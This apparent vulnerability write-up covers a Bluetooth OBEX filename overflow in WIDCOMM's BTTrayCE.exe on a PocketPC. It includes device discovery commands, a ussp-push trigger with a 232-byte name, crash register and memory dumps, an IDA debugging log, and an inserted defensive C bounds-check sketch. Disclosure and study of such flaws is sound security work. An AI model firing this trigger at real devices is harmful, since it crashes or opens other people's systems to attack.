Shared by: Flavio58
Posted: 1/2/2010
BTTrayCE.exe normally runs from \Windows\Startup on my PocketPC (iPAQ 2215) device. I am currently running WIDCOMM BTW-CE 1.4.1 Build60. In order to debug this issue you must first remove this file from the startup folder and soft boot the iPAQ. Open IDA Pro Advanced 4.9 (32-bit) and choose Debugger -> Run -> Remote WinCE debugger. When the box comes up and asks for the path to the file, type in "\Windows\BTTrayCE.exe" and press OK. You need to trigger the overflow from a remote machine with Bluetooth enabled.

    kfinisterre@animosity:~/ussp-push-0.4$ hcitool scan
    Scanning ...
            00:04:3E:65:A1:C8       Pocket_PC

    kfinisterre@animosity:~/ussp-push-0.4$ sdptool browse 00:04:3E:65:A1:C8
    Browsing 00:04:3E:65:A1:C8 ...
    ...
    Service Name: OBEX Object Push
    Service RecHandle: 0x10001
    Service Class ID List:
      "OBEX Object Push" (0x1105)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 2
      "OBEX" (0x0008)
    Language Base Attr List:
      code_ISO639: 0x656e
      encoding:    0x6a
      base_offset: 0x100
    Profile Descriptor List:
      "OBEX Object Push" (0x1105)
        Version: 0x0100
    ...

The following ussp-push command should trigger the overflow.

    animosity:/home/kfinisterre/ussp-push-0.4# ./ussp-push 00:04:3E:65:A1:C8@2 /etc/hosts `perl -e 'print "A" x 232'`
    pushing file /etc/hosts
    name=/etc/hosts, size=257
    Registered transport
    set user data
    created new objext
    Local device 00:20:E0:4C:CF:DF
    Remote device 00:04:3E:65:A1:C8 (2)

    started a new request
    reqdone
    Command (00) has now finished, rsp: 20
    Connected!
    Connection return code: 0, id: 0
    Connection established
    connected to server
    Sending file: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, path: /etc/hosts, size: 257
    reqdone

When the program crashes this is where we are.

    coredll.dll:01F83AA0 loc_1F83AA0                 ; CODE XREF: coredll.dll:01F83AA8 j
    coredll.dll:01F83AA0                 LDR     R0, [R1,R0]!
    coredll.dll:01F83AA4

$r0 is 41414141
$r1 is 240555A8

This is exactly AT $r1...

    debug837:240555A8 DCB 0x41 ; A
    debug837:240555A9 DCB 0x41 ; A
        ... (0x41 at every byte from 240555A8 through 240555EF, 72 bytes) ...
    debug837:240555EF DCB 0x41 ; A
    debug837:240555F0 DCB 0x53 ; S
    debug837:240555F1 DCB    0

This is the data before $r1

    debug837:240554FC DCB 0x5C ; \
    debug837:240554FD DCB    0
    debug837:240554FE DCB 0x54 ; T
    debug837:240554FF DCB    0
    debug837:24055500 DCB 0x65 ; e
    debug837:24055501 DCB    0
    debug837:24055502 DCB 0x6D ; m
    debug837:24055503 DCB    0
    debug837:24055504 DCB 0x70 ; p
    debug837:24055505 DCB    0
    debug837:24055506 DCB 0x5C ; \
    debug837:24055507 DCB    0
    debug837:24055508 DCB 0x41 ; A
    debug837:24055509 DCB 0x41 ; A
        ... (0x41 at every byte from 24055508 through 240555A7, 160 bytes) ...
    debug837:240555A7 DCB 0x41 ; A
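The dump shows the wide-character "\Temp\" prefix immediately followed by the 232-byte name taken from the OBEX Name header, and the 'A's run well past where the path buffer ends. As an added example (not WIDCOMM's code and not part of this write-up), here is a C sketch of the two checks a receiver should apply: validate the Name header's length field against the packet it arrived in, and refuse to build "\Temp\<name>" when it would not fit the fixed buffer. PATH_CAP, the prefix constant, the header layout and the demo packet are constructed assumptions for the illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
/* Constructed limits for this illustration, not WIDCOMM's code: the "\Temp\"
   prefix seen in the crash dump and a fixed-size wide path buffer. */
#define PATH_CAP 260
#define OBEX_HI_NAME 0x01 /* Name header: id, 2-byte BE length incl. the 3 header bytes, UTF-16BE */
static const uint16_t TEMP_PREFIX[] = { '\\', 'T', 'e', 'm', 'p', '\\' };
#define PREFIX_UNITS (sizeof TEMP_PREFIX / sizeof TEMP_PREFIX[0])

/* Parse one Name header. On success return a pointer to the UTF-16BE text and
   store its length in code units (without the terminator); NULL if malformed. */
static const uint8_t *obex_name_header(const uint8_t *buf, size_t len, size_t *units)
{
    if (len < 3 || buf[0] != OBEX_HI_NAME) return NULL;
    size_t hlen = ((size_t)buf[1] << 8) | buf[2];
    if (hlen < 5 || hlen > len || (hlen - 3) % 2) return NULL; /* length must fit the packet */
    if (buf[hlen - 2] || buf[hlen - 1]) return NULL;           /* must end in a null unit */
    *units = (hlen - 3) / 2 - 1;
    return buf + 3;
}
/* Build "\Temp\<name>" into out[cap], refusing input that does not fit.
   Returns code units written (without terminator), or -1 on rejection. */
static int build_temp_path(const uint8_t *name_be, size_t units, uint16_t *out, size_t cap)
{
    if (units > cap || cap - units < PREFIX_UNITS + 1) return -1; /* the bounds check that was missing */
    memcpy(out, TEMP_PREFIX, sizeof TEMP_PREFIX);
    for (size_t i = 0; i < units; i++) {
        uint16_t cu = (uint16_t)((name_be[2 * i] << 8) | name_be[2 * i + 1]);
        if (cu == 0 || cu == '\\' || cu == '/') return -1; /* no embedded nulls or separators */
        out[PREFIX_UNITS + i] = cu;
    }
    out[PREFIX_UNITS + units] = 0;
    return (int)(PREFIX_UNITS + units);
}
/* Demo: a constructed Name header carrying n 'A's (232 in the write-up) received
   into a path buffer of cap units. Returns the build result, -2 for a malformed
   header (truncate=1 hands the parser one byte less than the header claims). */
static int demo_receive(size_t n, size_t cap, int truncate)
{
    uint8_t pkt[3 + 2 * 256];
    uint16_t path[PATH_CAP];
    size_t hlen = 3 + 2 * (n + 1), units;
    if (n >= 256 || cap > PATH_CAP) return -3;
    pkt[0] = OBEX_HI_NAME; pkt[1] = (uint8_t)(hlen >> 8); pkt[2] = (uint8_t)hlen;
    for (size_t i = 0; i < n; i++) { pkt[3 + 2 * i] = 0; pkt[4 + 2 * i] = 'A'; }
    pkt[hlen - 2] = pkt[hlen - 1] = 0;
    const uint8_t *txt = obex_name_header(pkt, truncate ? hlen - 1 : hlen, &units);
    return txt ? build_temp_path(txt, units, path, cap) : -2;
}
```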

IDA output for the session:

        bytes pages size description
    --------- ----- ---- -------------------------------------------
       262144    32 8192 allocating memory for b-tree...
        65536     8 8192 allocating memory for virtual array...
       262144    32 8192 allocating memory for name pointers...
    -----------------------------------------------------------------
       589824            total memory allocated
    Loading IDP module C:\Program Files\IDA\procs\pc.w32 for processor metapc...OK
    Autoanalysis subsystem has been initialized.
    Unloading IDP module C:\Program Files\IDA\procs\pc.w32...
    Loading IDP module C:\Program Files\IDA\procs\arm.w32 for processor arm...OK
    Connection to the Windows CE device has been established.
    Debugger: Process started: \Windows\BTTrayCE.exe
    Possible file format: PE executable (C:\Program Files\IDA\loaders\dbg.ldw)
    Possible file format: MS-DOS executable (EXE) (C:\Program Files\IDA\loaders\dos.ldw)
    Possible file format: Portable executable for ARM (PE) (C:\Program Files\IDA\loaders\pe.ldw)
    Loading file '\Windows\BTTrayCE.exe' into database...
    Detected file format: Portable executable for ARM (PE)
    1015. Creating a new segment (00011000-00026A00) ... ... OK
    1016. Creating a new segment (00027000-00029A00) ... ... OK
    1017. Creating a new segment (0002A000-00033600) ... ... OK
    1018. Creating a new segment (00034000-00035600) ... ... OK
    1019. Creating a new segment (00036000-00037400) ... ... OK
    Reading exports directory...
    Reading imports directory...
    1020. Creating a new segment (0002A4F8-00033600) ... ... OK
    Assuming __cdecl calling convention by default
    Flushing buffers, please wait...ok
    File '\Windows\BTTrayCE.exe' is successfully loaded into the database.
    Compiling file 'C:\Program Files\IDA\idc\ida.idc'...
    Executing function 'main'...
    Compiling file 'C:\Program Files\IDA\idc\onload.idc'...
    Executing function 'OnLoad'...
    IDA is analysing the input file...
    You may start to explore the input file right now.
    Debugger: Library loaded: \Windows\olece300.dll
    Debugger: Library loaded: \Windows\doclist.dll
    Debugger: Library loaded: \Windows\mfcce300.dll
    Debugger: Library loaded: \Windows\BTChooserLib.dll
    Debugger: Library loaded: \Windows\wbtapiCE.dll
    Debugger: Library loaded: \Windows\note_prj.dll
    Debugger: Library loaded: \Windows\toolhelp.dll
    Debugger: Library loaded: \Windows\ceshell.dll
    Debugger: Library loaded: \Windows\shutil.dll
    Debugger: Library loaded: \Windows\tshres.dll
    Debugger: Library loaded: \Windows\commctrl.dll
    Debugger: Library loaded: \Windows\oleaut32.dll
    Debugger: Library loaded: \Windows\ossvcs.dll
    Debugger: Library loaded: \Windows\aygshell.dll
    Debugger: Library loaded: \Windows\ole32.dll
    Debugger: Library loaded: \Windows\coredll.dll
    The initial autoanalysis has been finished.
    Debugger: Thread started: id=334B0892, entry=00022360.
    Debugger: Library loaded: \Windows\btrez.dll
    Debugger: Thread started: id=B329EFDA, entry=01744594.
    Debugger: Library loaded: \Windows\richink.dll
    Debugger: Library loaded: \Windows\ws2.dll
    Debugger: Library loaded: \Windows\winsock.dll
    Debugger: Library loaded: \Windows\chngtrk.dll
    Debugger: Library loaded: \Windows\outres.dll
    Debugger: Library loaded: \Windows\cemapi.dll
    Debugger: Library loaded: \Windows\BTCeOsif4.dll
    Debugger: Library loaded: \Windows\pimutil.dll
    Debugger: Library loaded: \Windows\calstore.dll
    Debugger: Library loaded: \Windows\pimstore.dll
    Debugged application message: Data Abort: Thread=935f0400 Proc=900d84b8 'BTTrayCE.exe'.
    Debugged application message: AKY=00020001 PC=01f83aa0 RA=01f839dc BVA=684a991c FSR=000000f5.
    BTTrayCE.exe: The instruction at 0x1F83AA0 referenced memory at 0x684A991C. The memory could not be read (0x01F83AA0 -> 684A991C)